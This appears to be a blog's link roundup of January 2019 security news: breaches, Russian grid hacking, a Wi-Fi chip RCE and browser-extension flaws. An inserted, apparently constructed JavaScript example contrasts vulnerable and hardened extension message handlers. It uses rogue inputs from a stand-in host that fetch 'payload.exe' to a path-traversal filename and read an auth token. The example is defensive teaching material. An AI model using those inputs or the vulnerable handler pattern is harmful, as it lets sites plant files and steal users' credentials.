Cyber Security News January 2019

This posting is here to collect cyber security news in January 2019.

I post links to security vulnerability news in the comments of this article.

If you are interested in cyber security trends, read my Cyber security trends 2019 posting.

You are also free to post related links.


412 Comments

  1. Tomi Engdahl says:

    The Rise and Fall of Ashiyane – Iran’s Foremost Hacker Forum
    https://www.securityweek.com/rise-and-fall-ashiyane-irans-foremost-hacker-forum

    According to Recorded Future’s researchers, Iran’s hacking scene is a complex mix of government-sponsored contractors. The most prominent feature in modern Iranian history is its tendency to employ proxies for extra-national activities, such as Hezbollah against Israel and Yemen rebels against Saudi Arabia.

  2. Tomi Engdahl says:

    Hackers Can Abuse Legitimate Features to Hijack Industrial Controllers
    https://www.securityweek.com/hackers-can-abuse-legitimate-features-hijack-industrial-controllers-expert

    Hackers can abuse legitimate features present in industrial controllers to hijack these devices and leverage them to gain a foothold in a network, a researcher warns.

    Programmable logic controllers (PLCs) allow users to control and monitor physical processes in industrial environments. While these types of devices are known to have vulnerabilities, including ones that could be leveraged to create a dangerous worm, researchers have shown in the past that malicious actors may also be able to abuse legitimate PLC features to achieve their goals.

    Roee Stark, a senior software engineer at industrial cybersecurity firm Indegy, has now demonstrated another type of attack that only leverages legitimate features. The expert has analyzed PLCs made by Rockwell Automation and found that certain Common Industrial Protocol (CIP) commands can be abused for malicious purposes.

  3. Tomi Engdahl says:

    Cops told: No, you can’t have a warrant to force a big bunch of people to unlock their phones by fingerprint, face scans
    https://www.theregister.co.uk/2019/01/14/biometric_device_access/

    Judge rules compelled use of biometrics runs into Fifth Amendment protections

  4. Tomi Engdahl says:

    Over 140 International Airlines Affected by Major Security Breach
    https://www.bleepingcomputer.com/news/security/over-140-international-airlines-affected-by-major-security-breach/

    Potential attackers could view and change private information in flight bookings made by millions of customers of major international airlines because of a security issue in the Amadeus online booking system found by Safety Detective’s Noam Rotem.

    Currently, the Amadeus ticket booking system is being used by 141 international airlines which gives it control over 44% of the global online reservation market, with United Airlines, Lufthansa, and Air Canada being some of its clients.

    As described by Safety Detective’s research labs, the security bug was found when trying to book a flight on the EL AL airline, Israel’s national carrier, which sent the security researchers “the following link to check our PNR: https://fly.elal.co.il/LOTS-OF-NUMBERS-HERE.”

  5. Tomi Engdahl says:

    Researcher shows how popular app ES File Explorer exposes Android device data
    https://techcrunch.com/2019/01/16/android-app-es-file-explorer-expose-data/

    Why is one of the most popular Android apps running a hidden web server in the background?

    ES File Explorer claims it has more than 500 million downloads under its belt since 2014, making it one of the most used apps to date. Its simplicity makes it what it is: a simple file explorer that lets you browse through your Android phone or tablet’s file system for files, data, documents and more.

    But behind the scenes, the app is running a slimmed-down web server on the device. In doing so, it opens up the entire Android device to a whole host of attacks — including data theft.

    Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the exposed port last week, and disclosed his findings in several tweets on Wednesday. Prior to tweeting, he showed TechCrunch how the exposed port could be used to silently exfiltrate data from the device.

    “All connected devices on the local network can get [data] installed on the device,” he said.

    Using a simple script he wrote, Robert demonstrated how he could pull pictures, videos and app names — or even grab a file from the memory card.

    Robert said app versions 4.1.9.5.2 and below have the open port.

    “It’s clearly not good.”

    We contacted the makers of ES File Explorer but did not hear back prior to publication.

    https://www.tivi.fi/Kaikki_uutiset/kaytatko-sinakin-tata-suursuosittua-android-sovellusta-jarkyttava-vaara-poista-heti-olen-varma-etta-se-on-tahallaan-nain-6755338

  6. Tomi Engdahl says:

    Top GP: Medical app Your.MD’s data security wasn’t my remit
    Prof Maureen Baker told tribunal info security and clinical safety are two separate things
    https://www.theregister.co.uk/2019/01/17/your_md_medical_symptom_app_employment_tribunal/

    The founders of medical symptom-checker app Your.MD knew that a number of key medical information databases were “open to anyone who knows the URL”, emails seen by a London tribunal have revealed.

    The emails also revealed that:

    Your.MD execs were aware that five key databases were “publicly available to the internet” in June 2017;
    the firm had no way of validating, at the time, that business-critical microservices “still work[ed] to specification” following changes; and
    data from Your.MD’s medical knowledge database, Alexandria, “can be downloaded worldwide, and modified, without even a password”.

    In addition, a Facebook chatbot devised by Your.MD allegedly allowed its Facebook page admins direct access to customers’ health data.

    Professor Baker responded to Hochhauser’s early line of questioning about data security by saying: “If I can expand. I’m really focused on the medical and professional aspects. I’m not – I didn’t have any discussions about the tech or the presentations and this hasn’t come up in the discussions I’ve had with the medical teams.”

    Her Scottish lilt remaining level and clear in the well-heated hearing room, she added: “I’m talking here specifically about clinical safety. Clinical safety and data security are not the same thing… that’s not my remit.”

    Surely, asked Hochhauser, the Alexandria medical knowledge database being unsecured meant that “a malicious person could make the service misdiagnose dangerous conditions?”

    Baker said in response that while any abuses like that would be “deplorable and highly unsatisfactory”, systems involving medical records do require people to have access to it “in order to do their jobs: the same could be said of any receptionist or administrator in any healthcare system”.

  7. Tomi Engdahl says:

    What we learned by unpacking a recent wave of Imminent RAT infections using AMP
    https://blog.talosintelligence.com/2019/01/what-we-learned-by-unpacking-recent.html

  8. Tomi Engdahl says:

    Malware Built to Hack Building Automation Systems
    Researchers dig into vulnerabilities in popular building automation systems, devices.
    https://www.darkreading.com/vulnerabilities---threats/malware-built-to-hack-building-automation-systems/d/d-id/1333671

    S4x19 — Miami — Researchers who discovered multiple vulnerabilities in building automation system (BAS) equipment have also constructed proof-of-concept malware to exploit some of those security weaknesses.

  9. Tomi Engdahl says:

    773M Password ‘Megabreach’ is Years Old
    https://krebsonsecurity.com/2019/01/773m-password-megabreach-is-years-old/

    My inbox and Twitter messages positively lit up today with people forwarding stories from Wired and other publications about a supposedly new trove of nearly 773 million unique email addresses and 21 million unique passwords that were posted to a hacking forum. A story in The Guardian breathlessly dubbed it “the largest collection ever of breached data found.” But in an interview with the apparent seller, KrebsOnSecurity learned that it is not even close to the largest gathering of stolen data, and that it is at least two to three years old.

    Largest collection ever of breached data found
    https://www.theguardian.com/technology/2019/jan/17/breached-data-largest-collection-ever-seen-email-password-hacking

  10. Tomi Engdahl says:

    Happy Thursday! 770 MEEELLLION email addresses and passwords found in yuge data breach
    Now is a good time to get a password manager app
    https://www.theregister.co.uk/2019/01/17/770m_emails_passwords_breach_collection_1/

  11. Tomi Engdahl says:

    Misconfigured Server Leaks Oklahoma Department of Securities Data
    https://www.securityweek.com/misconfigured-server-leaks-oklahoma-department-securities-data

    A storage server configured for public access was found to expose terabytes of data belonging to the Oklahoma Department of Securities, UpGuard reveals.

    The server was found on December 7 and Oklahoma was notified of the exposure on December 8, when public access was removed. While it’s uncertain for how long the data store was exposed, the server first appeared on Shodan (a search engine for Internet-facing IP addresses) on November 30.

    The data on the server totaled three terabytes and millions of files, containing personal information, system credentials, internal documentation, and communications intended for the Oklahoma Securities Commission, among others.

    “The amount, and reach, of administrative and staff credentials represents a significant impact to the Oklahoma Department of Securities’ network integrity,” UpGuard says.

  12. Tomi Engdahl says:

    America’s Electric Grid Has a Vulnerable Back Door—and Russia Walked Through It
    https://outline.com/3BxDdG

    One morning in March 2017, Mike Vitello’s work phone lighted up. Customers wanted to know about an odd email they had just received. What was the agreement he wanted signed? Where was the attachment?

    Mr. Vitello had no idea what they were talking about.

    Then, a few months later, the U.S. Department of Homeland Security dispatched a team to examine the company’s computers. You’ve been attacked, a government agent told Mr. Vitello’s colleague, Dawn Cox. Maybe by Russians. They were trying to hack into the power grid.

    “They were intercepting my every email,” Mr. Vitello says. “What the hell? I’m nobody.”

    “It’s not you. It’s who you know,” says Ms. Cox.

    The cyberattack on the 15-person company near Salem, Ore., which works with utilities and government agencies, was an early thrust in the worst known hack by a foreign government into the nation’s electric grid. It set off so many alarms that the U.S. government took the unusual step in early 2018 of publicly blaming the Russian government.

    A reconstruction of the hack reveals a glaring vulnerability at the heart of the country’s electric system. Rather than strike the utilities head on, the hackers went after the system’s unprotected underbelly—hundreds of contractors and subcontractors like All-Ways who had no reason to be on high alert against foreign agents.

    The scheme’s success came less from its technical prowess—though the attackers did use some clever tactics—than in how it exploited trusted business relationships using impersonation and trickery.

    The hackers planted malware on sites of online publications frequently read by utility engineers. They sent out fake résumés with tainted attachments, pretending to be job seekers. Once they had computer-network credentials, they slipped through hidden portals used by utility technicians, in some cases getting into computer systems that monitor and control electricity flows.

    The U.S. government hasn’t named the utilities or other companies that were targeted.

    “What Russia has done is prepare the battlefield without pulling the trigger,” says Robert P. Silvers, former assistant secretary for cyber policy at Homeland Security and now a law partner at Paul Hastings LLP.

    According to a CFE email, the agent told employees that “highly sophisticated individuals” had uploaded a malicious file onto the website for Control Engineering. The agent warned it could be used to launch hostile actions against others.

    By planting a few lines of code on the websites, the attackers invisibly plucked computer usernames and passwords from unsuspecting visitors, according to government briefings on the attack and security experts who have reviewed the malicious code. That tactic enabled the Russians to gain access to ever more sensitive systems.

    On March 2, 2017, the attackers used Mr. Vitello’s account to send the mass email to customers, which was intended to herd recipients to a website secretly taken over by the hackers.

    Web developer Matt Hudson says he had no idea Russians had hacked into his site.

    Once Mr. Vitello realized his email had been hijacked, he tried to warn his contacts not to open any email attachments from him. The hackers blocked the message.

    In June 2017, the hackers used the Corvallis company’s systems to go hunting. Over the next month, they accessed the Oregon company’s network dozens of times from computers with IP addresses registered in countries including Turkey, France and the Netherlands, targeting at least six energy firms.

    In some cases, the attackers simply studied the new targets’ websites, possibly as reconnaissance for future strikes. In other instances, the investigative report indicates, they may have gained footholds inside their victims’ systems.

    Two of the targeted companies had helped the Army create independent supplies of electricity for domestic bases.

    That June 30, the hackers sought remote access to an Indiana company that, like ReEnergy, installs equipment to allow government facilities to operate if the civilian grid loses power.

    Federal officials say the attackers looked for ways to bridge the divide between the utilities’ corporate networks, which are connected to the internet, and their critical-control networks, which are walled off from the web for security purposes.

    In briefings to utilities last summer, Jonathan Homer, industrial-control systems cybersecurity chief for Homeland Security, said the Russians had penetrated the control-system area of utilities through poorly protected jump boxes. The attackers had “legitimate access, the same as a technician.”

    Industry experts say Russian government hackers likely remain inside some systems, undetected and awaiting further orders.

  13. Tomi Engdahl says:

    Facebook’s ’10 Year Challenge’ Is Just a Harmless Meme—Right?
    https://www.wired.com/story/facebook-10-year-meme-challenge/

    If you use social media, you’ve probably noticed a trend across Facebook, Instagram, and Twitter of people posting their then-and-now profile pictures, mostly from 10 years ago and this year.

    Through the Facebook meme, most people have been helpfully adding that context back in (“me in 2008 and me in 2018”) as well as further info, in many cases, about where and how the pic was taken (“2008 at University of Whatever, taken by Joe; 2018 visiting New City for this year’s such-and-such event”).

    In other words, thanks to this meme, there’s now a very large dataset of carefully curated photos of people from roughly 10 years ago and now.

    For its part, Facebook denies having any hand in the #10YearChallenge. “This is a user-generated meme that went viral on its own,” a Facebook spokesperson responded.

    But even if this particular meme isn’t a case of social engineering, the past few years have been rife with examples of social games and memes designed to extract and collect data. Just think of the mass data extraction of more than 70 million US Facebook users performed by Cambridge Analytica.

    Is it bad that someone could use your Facebook photos to train a facial recognition algorithm? Not necessarily; in a way, it’s inevitable. Still, the broader takeaway here is that we need to approach our interactions with technology mindful of the data we generate and how it can be used at scale. I’ll offer three plausible use cases for facial recognition: one respectable, one mundane, and one risky.

  14. Tomi Engdahl says:

    https://www.tivi.fi/Kaikki_uutiset/suomalainen-teollisuusjatti-kasvaa-kyberturvallisuusyhtioksi-hyokkaajien-motiivit-ovat-muuttumassa-6755286

    Wärtsilä is seeking new growth from cyber security services. Wärtsilä believes that the new cyber services give the company opportunities to grow both its equipment and service sales in the marine and energy industries.

  15. Tomi Engdahl says:

    US bills would ban exports to Chinese telecoms that violate sanctions
    Huawei and ZTE are singled out as potential targets.
    https://www.engadget.com/2019/01/16/us-bills-ban-exports-to-chinese-telecoms/

    American politicians want to crack down further on Chinese telecoms like Huawei and ZTE. Members of both the House of Representatives and the Senate have introduced bills that would order the President to impose export bans on Chinese telecoms found to violate US export and sanctions laws. Companies like Huawei and ZTE are a “growing threat to American national security,” according to co-sponsor Rep. Mike Gallagher, and they should face the same punishment that ZTE faced before its reprieves.

    The politicians aren’t shy about the reasons behind the move. This is partly in response to the arrest of Huawei CFO Meng Wanzhou in Canada over US allegations she helped her company violate US trade sanctions against Iran. This would potentially force the President to ban Huawei’s US-based equipment exports, limiting its ability to do business around the world. It wouldn’t be as severe a blow as it was for ZTE, since Huawei designs its own mobile processors, but it could have a noticeable effect.

  16. Tomi Engdahl says:

    Joseph Cox / Motherboard:
    Some hacked Instagram influencers who find its account recovery process cumbersome are turning to third-party experts and white hat hackers to regain access

    Hacked Instagram Influencers Rely on White-Hat Hackers to Get Their Accounts Back
    https://motherboard.vice.com/en_us/article/59vnvk/hacked-instagram-influencers-get-accounts-back-white-hat-hackers

    Leaked internal documents and stories from influencers show that Instagram has an influencer-hacking problem.

  17. Tomi Engdahl says:

    ‘Tracking every place you go’: Weather Channel app accused of selling user data
    https://amp.theguardian.com/technology/2019/jan/04/weather-channel-app-lawsuit-location-data-selling

    Most popular mobile weather app misled users who shared location information, say Los Angeles prosecutors in lawsuit

  18. Tomi Engdahl says:

    Employee Falls for Fake Job Interview Over Skype, Gives North Korean Hackers Access to Chile’s ATM Network: Report
    https://gizmodo.com/employee-falls-for-fake-job-interview-over-skype-gives-1831801832

    The one thing no one expects on a job interview is North Korean hackers picking up on the other line. But that’s apparently exactly what happened to a hapless employee at Redbanc, the company that handles Chile’s ATM network.

    The bizarre story was reported in trendTIC, a Chilean tech site. A Redbanc employee found a job opening on LinkedIn for a developer position.

  19. Tomi Engdahl says:

    Massive breach leaks 773 million emails, 21 million passwords
    https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

    The best time to stop reusing old passwords was 10 years ago. The second best time is now.

  20. Tomi Engdahl says:

    Washington Post:
    Sources: FTC commissioners met to discuss imposing a record-setting fine against Facebook for failing to safeguard user privacy, violating 2011 consent decree
    http://www.washingtonpost.com/technology/2019/01/18/us-regulators-have-met-discuss-imposing-record-setting-fine-against-facebook-some-its-privacy-violations/

  21. Tomi Engdahl says:

    Dami Lee / The Verge:
    Verizon says its spam and robocall protection service, previously available as a $3 add-on, will be free to all subscribers starting in March — Verizon announced this week that it will offer free spam and robocall protection to its subscribers starting in March.

    Verizon will offer free spam protection to all of its customers
    https://www.theverge.com/2019/1/18/18188140/verizon-free-spam-robocall-protection

  22. Tomi Engdahl says:

    Sarah Perez / TechCrunch:
    Twitter says a bug led to the “Protect your Tweets” setting being disabled for some Android users for almost five years, making their tweets public

    Twitter bug revealed some Android users’ private tweets
    https://techcrunch.com/2019/01/17/twitter-bug-revealed-some-android-users-private-tweets/

    Twitter accidentally revealed some users’ “protected” (aka, private) tweets, the company disclosed this afternoon. The “Protect your Tweets” setting typically allows people to use Twitter in a non-public fashion. These users get to approve who can follow them and who can view their content. For some Android users over a period of several years, that may not have been the case — their tweets were actually made public as a result of this bug.

  23. Tomi Engdahl says:

    How U.S. surveillance technology is propping up authoritarian regimes
    https://www.washingtonpost.com/outlook/2019/01/17/how-us-surveillance-technology-is-propping-up-authoritarian-regimes/

    NSO Group, an Israeli cyberintelligence firm, makes spyware that it sells to a variety of government clients around the world. It has denied that those surveillance products were involved in the torture and murder of Washington Post journalist Jamal Khashoggi, although it has neither confirmed nor denied selling its products to the Saudi government — elements of which, the CIA has concluded, ordered the killing.

  24. Tomi Engdahl says:

    Norway Readies ‘Big Brother’ GPS-Based Taxation Per Mile-Driven
    https://www.zerohedge.com/news/2019-01-17/norway-readies-big-brother-gps-based-taxation-mile-driven

    The Norwegian Data Protection Authority is now arguing that GPS based taxation, for the amount of kilometers driven by car, can be done within 5-6 years!

    Norwegians trust the government way too much, because they believe that this system will eliminate the need for road tax, fuel tax, toll roads and reduce the cost of car insurance.

    No way will the tax be reduced! GPS based taxation is a government’s dream! Who is to stop them from issuing parking fees or speeding tickets?

  25. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    Researcher: vulnerability in Marvell’s Wi-Fi SoC used in the PS4, Xbox One, Surface tablets, and more lets attacker hijack devices without any user interaction

    WiFi firmware bug affects laptops, smartphones, routers, gaming devices
    https://www.zdnet.com/article/wifi-firmware-bug-affects-laptops-smartphones-routers-gaming-devices/

    List of impacted devices includes PS4, Xbox One, Samsung Chromebooks, and Microsoft Surface devices.

    Details have been published today about a vulnerability affecting the firmware of a popular WiFi chipset deployed in a wide range of devices, such as laptops, smartphones, gaming rigs, routers, and Internet of Things (IoT) devices.

    Selianin described how someone could exploit the ThreadX firmware installed on a Marvell Avastar 88W8897 wireless chipset to execute malicious code without any user interaction.

    The researcher chose this WiFi SoC (system-on-a-chip) because this is one of the most popular WiFi chipsets on the market, being deployed with devices such as Sony PlayStation 4, Xbox One, Microsoft Surface laptops, Samsung Chromebooks, Samsung Galaxy J1 smartphones, and Valve SteamLink cast devices, just to name a few.

    Selianin’s report contains the technical details on exploiting the vulnerability.

    Remotely compromise devices by using bugs in Marvell Avastar Wi-Fi: from zero knowledge to zero-click RCE
    https://embedi.org/blog/remotely-compromise-devices-by-using-bugs-in-marvell-avastar-wi-fi-from-zero-knowledge-to-zero-click-rce/

  26. Tomi Engdahl says:

    Nicole Perlroth / New York Times:
    DNC says in court filing that it was a target of a failed spearphishing campaign after the midterms; researchers: the campaign resembled Russia-linked attacks — SAN FRANCISCO — The Democratic National Committee believes it was targeted in a hacking attempt by a Russian group in the weeks …

    D.N.C. Says It Was Targeted Again by Russian Hackers After ’18 Election
    https://www.nytimes.com/2019/01/18/technology/dnc-russian-hacking.html

    The committee said in new court filings that it was targeted in an attempted hacking by a Russian group after the midterm elections.

    On Nov. 14, the documents say, dozens of D.N.C. email addresses were on the receiving end of a so-called spearphishing campaign by one of two Russian organizations believed to be responsible for hacking into the committee’s computers during the 2016 presidential race. There is no evidence that the most recent attack was successful.

    The documents, filed in federal court in New York, were part of an amended complaint in a lawsuit filed in April that claimed the committee was the victim of a conspiracy by Russian intelligence agents, President Trump’s 2016 campaign and WikiLeaks to damage Hillary Clinton’s presidential run.

  27. Tomi Engdahl says:

    Nicole Perlroth / New York Times:
    DNC says in court filing that it was a target of a failed spearphishing campaign after the midterms; researchers: the campaign resembled Russia-linked attacks

    D.N.C. Says It Was Targeted Again by Russian Hackers After ’18 Election
    https://www.nytimes.com/2019/01/18/technology/dnc-russian-hacking.html

    The Democratic National Committee believes it was targeted in a hacking attempt by a Russian group in the weeks after the midterm elections last year, according to court documents filed late Thursday.

  28. Tomi Engdahl says:

    Popular WordPress plugin hacked by angry former employee
    https://www.zdnet.com/article/popular-wordpress-plugin-hacked-by-angry-former-employee/

    Hacker defaced the company’s website and sent a mass email to all its customers, alleging unpatched security holes.

    The plugin in question is WPML (or WP MultiLingual), the most popular WordPress plugin for translating and serving WordPress sites in multiple languages.

    According to its website, WPML has over 600,000 paying customers and is one of the very few WordPress plugins that is so reputable that it doesn’t need to advertise itself with a free version on the official WordPress.org plugins repository.

    https://wpml.org/

  29. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    A casino group behind sites like easybet.com left 108M+ records exposed on a server including players’ bets, withdrawals, names, home addresses, phone numbers

    Online casino group leaks information on 108 million bets, including user details
    https://www.zdnet.com/article/online-casino-group-leaks-information-on-108-million-bets-including-user-details/

    Server is now down but it is unclear if the cloud provider took it down and if the parent company knows it leaked users details in the first place.

  30. Tomi Engdahl says:

    Romain Dillet / TechCrunch:
    Google fined €50M by French watchdog CNIL under GDPR for alleged lack of transparency, info, and consent about ads personalization in Android’s onboarding flow

    French data protection watchdog fines Google $57 million under the GDPR
    https://techcrunch.com/2019/01/21/french-data-protection-watchdog-fines-google-57-million-under-the-gdpr/

  31. Tomi Engdahl says:

    Websites can steal browser data via extensions APIs
    https://www.zdnet.com/article/websites-can-steal-browser-data-via-extensions-apis/

    Researcher finds nearly 200 Chrome, Firefox, and Opera extensions vulnerable to attacks from malicious sites.

    Malicious websites can exploit browser extension APIs to execute code inside the browser and steal sensitive information such as bookmarks, browsing history, and even user cookies.

    The latter, an attacker can use to hijack a user’s active login sessions and access sensitive accounts, such as email inboxes, social media profiles, or work-related accounts.

    Furthermore, the same extension APIs can also be abused to trigger the download of malicious files and store them on the user device, and store and retrieve data in an extension’s permanent storage, data that can later be used to track users across the web.

  32. Tomi Engdahl says:

    Fortnite security issue would have granted hackers access to accounts
    https://www.zdnet.com/article/fortnite-security-issue-would-have-granted-hackers-access-to-accounts/

    Check Point recommends that Fortnite players enable two-factor authentication (2FA) for their accounts.

  33. Tomi Engdahl says:

    Cyber security: This giant blind spot will cost us dear
    https://www.zdnet.com/article/cyber-security-this-giant-blind-spot-will-cost-us-dear/

    Cyber attacks are one of the biggest risks facing the world. Our inability to address the underlying issues risks disaster.

  34. Tomi Engdahl says:

    This cryptocurrency mining malware now disables security software to help remain undetected
    https://www.zdnet.com/article/this-cryptocurrency-mining-malware-now-disables-security-software-to-help-remain-undetected/

  35. Tomi Engdahl says:

    Bipartisan Bill introduced to ban sale of US tech to Huawei and ZTE
    https://www.zdnet.com/article/bipartisan-bill-introduced-to-ban-sale-of-us-tech-to-huawei-and-zte/

    US lawmakers introduce bipartisan Bill that, if passed, would ban the export of US chips and other components to the two Chinese tech companies.

  36. Tomi Engdahl says:

    Russian Watchdog Launches ‘Administrative Proceedings’ Against Facebook, Twitter
    https://www.securityweek.com/russian-watchdog-launches-administrative-proceedings-against-facebook-twitter

    Russia’s media watchdog Roskomnadzor launched “administrative proceedings” Monday against US social media giants Facebook and Twitter, accusing them of not complying with Russian law, news agencies reported.

    “Today, Roskomnadzor begins administrative proceedings against both companies (Facebook and Twitter),” the watchdog’s head Alexander Zharov told the Interfax news agency.

    The state regulator has repeatedly warned the companies they could be banned if they do not comply with a 2014 law requiring social networking sites to store the personal data of Russian users inside the country.

  37. Tomi Engdahl says:

    Proposed Law Classifies Ransomware Infection as a Data Breach
    https://www.securityweek.com/proposed-law-classifies-ransomware-infection-data-breach

    The newly announced Act to Strengthen Identity Theft Protections in North Carolina proposes that ransomware attacks be treated as data breaches.

    Unveiled last week by Attorney General Josh Stein and Rep. Jason Saine, the legislation proposes that, in addition to incidents where data is stolen, even unauthorized access to someone’s personal information should be considered a data breach.

    Thus, ransomware attacks, where the victim’s personal information is only accessed, without necessarily being stolen, will be included in the definition of data breaches, and organizations will have to report these incidents as well.

    Reply
  38. Tomi Engdahl says:

    Let’s Encrypt Begins Retirement of TLS-SNI-01 Validation
    https://www.securityweek.com/lets-encrypt-begins-retirement-tls-sni-01-validation

    Free and open Certificate Authority (CA) Let’s Encrypt today started the process of completely retiring TLS-SNI-01 validation support.

    Let’s Encrypt decided last year that it would disable support for the TLS-SNI-01 validation after learning that users could abuse it to obtain certificates for domains they do not own. The problem, the CA revealed at the time, was the use of the ACME TLS-SNI-01 challenge type for domains on a shared hosting infrastructure.

    Although the issue wasn’t related to the certificate authority itself, but instead the result of a combination of factors, Let’s Encrypt decided that disabling support for the validation method was the best way to handle the situation at the time.

    Reply
  39. Tomi Engdahl says:

    Unofficial Patches Released for Three Unfixed Windows Flaws
    https://www.securityweek.com/unofficial-patches-released-three-unfixed-windows-flaws

    ACROS Security’s 0patch service has released unofficial patches for three Windows vulnerabilities that Microsoft has yet to address, including denial-of-service (DoS), file read, and code execution issues.

    Reply
  40. Tomi Engdahl says:

    Community Project Crushes 100,000 Malware Sites in 10 Months
    https://www.securityweek.com/community-project-crushes-100000-malware-sites-10-months

    Nearly 100,000 malware distribution websites have been identified and taken down over the course of 10 months as part of an abuse.ch project called URLhaus.

    Launched at the end of March 2018 with the purpose of collecting and sharing URLs used for malware distribution, the project has already proven a great success and enjoyed help from the community, abuse.ch says.

    During the past 10 months, 265 security researchers around the world have identified and submitted on average 300 malware sites each day. On average, URLhaus counts between 4,000 and 5,000 active malware distribution sites daily.

    “2/3 of the top malware hosting networks are hosted either in the US or China,” abuse.ch reveals.

    Reply
  41. Tomi Engdahl says:

    Hacker Uses Nest Camera to Broadcast Hoax Nuke Alert
    https://www.securityweek.com/hacker-uses-nest-camera-broadcast-hoax-nuke-alert

    Nest urged owners of its security cameras Tuesday to use enhanced authentication to thwart hackers, after one terrified a family with a hoax nuclear missile attack.

    A couple living in a California town near San Francisco told local media they experienced “sheer terror” over the weekend when a Nest security camera atop their family’s television issued a realistic-sounding warning of missiles heading to the United States from North Korea.

    Reply
  42. Tomi Engdahl says:

    How Web Apps Can Turn Browser Extensions Into Backdoors
    https://threatpost.com/web-apps-browser-extensions-backdoors/141061/

    Researchers show how rogue web applications can be used to attack vulnerable browser extensions in a hack that gives adversaries access to private user data.

    Researchers have added another reason to be suspicious of web browser extensions. According to a recently published academic report, various Chrome, Firefox and Opera browser extensions can be compromised by an adversary that can steal sensitive browser data and plant arbitrary files on targeted systems.

    “We identified a good number of extensions that can be exploited by web applications to benefit from their privileged capabilities,”

    http://www-sop.inria.fr/members/Doliere.Some/papers/empoweb.pdf

    Reply
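The extension flaw class described above is usually a content script that relays `window.postMessage` data from the page to privileged extension code. The following is an added example, not code from the EmPoWeb paper or any real extension: the `privileged` object is a constructed stand-in for APIs such as `chrome.downloads` and `chrome.storage`, the origin `https://app.example` is an assumed legitimate site, and the messages are constructed. It shows the vulnerable relay beside a hardened handler that pins the origin, allowlists actions, validates every field, and never hands storage contents back to the page.

```javascript
// Constructed stand-ins for the extension's privileged APIs (assumption: they play
// the role of chrome.downloads.download and chrome.storage.local.get).
function makePrivileged(log) {
  const storage = { authToken: "constructed-secret-token" };
  return {
    download: (url, filename) => { log.push(`download ${url} -> ${filename}`); return true; },
    readStorage: (key) => (key in storage ? storage[key] : null),
  };
}

// Vulnerable pattern: the content script listens for window.postMessage from the
// page and dispatches on a field the page controls, straight into privileged
// code. Any site that can run script in the tab can drive the extension.
function vulnerableHandler(event, privileged) {
  const msg = event.data;
  if (!msg || typeof msg.action !== "string") return { ok: false };
  switch (msg.action) {
    case "download":
      return { ok: true, result: privileged.download(msg.url, msg.filename) };
    case "read":
      return { ok: true, result: privileged.readStorage(msg.key) };
    default:
      return { ok: false };
  }
}

// Hardened: pin the sender origin, expose only the action the page legitimately
// needs, validate each field, and never return storage contents to the page.
const ALLOWED_ORIGINS = new Set(["https://app.example"]); // assumption: the one site served
const ALLOWED_ACTIONS = new Set(["download"]);
const SAFE_FILENAME = /^[A-Za-z0-9._-]{1,64}$/; // no separators, so no path traversal

function hardenedHandler(event, privileged) {
  if (!ALLOWED_ORIGINS.has(event.origin)) return { ok: false, reason: "origin not allowed" };
  const msg = event.data;
  if (typeof msg !== "object" || msg === null) return { ok: false, reason: "malformed" };
  if (!ALLOWED_ACTIONS.has(msg.action)) return { ok: false, reason: "action not allowed" };
  let url;
  try { url = new URL(msg.url); } catch { return { ok: false, reason: "bad url" }; }
  if (url.protocol !== "https:") return { ok: false, reason: "scheme not allowed" };
  if (typeof msg.filename !== "string" || !SAFE_FILENAME.test(msg.filename)) {
    return { ok: false, reason: "bad filename" };
  }
  return { ok: true, result: privileged.download(url.href, msg.filename) };
}

// Constructed messages: one from the intended site, two from a rogue page, and one
// from the intended site after it has been compromised (e.g. via XSS).
const legitDownload = { origin: "https://app.example",
  data: { action: "download", url: "https://app.example/report.pdf", filename: "report.pdf" } };
const rogueRead = { origin: "https://evil.example", data: { action: "read", key: "authToken" } };
const rogueDrop = { origin: "https://evil.example",
  data: { action: "download", url: "https://evil.example/payload.exe", filename: "../../update.exe" } };
const xssDrop = { origin: "https://app.example",
  data: { action: "download", url: "https://evil.example/payload.exe", filename: "../../update.exe" } };

function runScenarios() {
  const log = [];
  const privileged = makePrivileged(log);
  return {
    vulnLeaksToken: vulnerableHandler(rogueRead, privileged).result,
    vulnDropsFile: vulnerableHandler(rogueDrop, privileged).ok,
    hardenedBlocksRead: hardenedHandler(rogueRead, privileged).reason,
    hardenedBlocksRogueDrop: hardenedHandler(rogueDrop, privileged).reason,
    hardenedBlocksXssDrop: hardenedHandler(xssDrop, privileged).reason,
    hardenedAllowsLegit: hardenedHandler(legitDownload, privileged).ok,
    downloadsPerformed: log.length,
  };
}
```

In a real content script the hardened handler would also check `event.source === window` so only the top-level page, not an embedded frame, can reach it; that check is left out here because the model has no `window` object.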
  43. Tomi Engdahl says:

    From the NSA to Silicon Valley, a new kind of encryption is going commercial
    https://www.cyberscoop.com/homomorphic-encryption-nsa-silicon-valley-commercial/

    Encryption as we know it is on the brink of a major advancement: Mathematics teams at IBM, Intel, Microsoft and a range of startup firms are pushing ahead with research that could make it possible for technology companies to encrypt data while it’s in use.

    This kind of security, known as homomorphic encryption, would mark a significant upgrade over current forms of encryption, which secure data while it’s stored or while it’s moving through a connection. Homomorphic encryption would better protect users who are using internet searches and accessing stored credit numbers as well as businesses that are sharing proprietary data as part of information sharing programs.

    Homomorphic encryption soon will help large companies protect their information at times when they need to share it in a multi-party computing environment, Horvath said.

    Reply
  44. Tomi Engdahl says:

    Malware, User Privacy Failures Found in Top Free VPN Android Apps
    https://www.bleepingcomputer.com/news/security/malware-user-privacy-failures-found-in-top-free-vpn-android-apps/

    One in five apps from the top 150 free VPN Android apps in Google’s Play Store was flagged as a potential source of malware, while a quarter of them come with user-privacy-breaking bugs such as DNS leaks, which expose user DNS queries to their ISPs.

    Reply
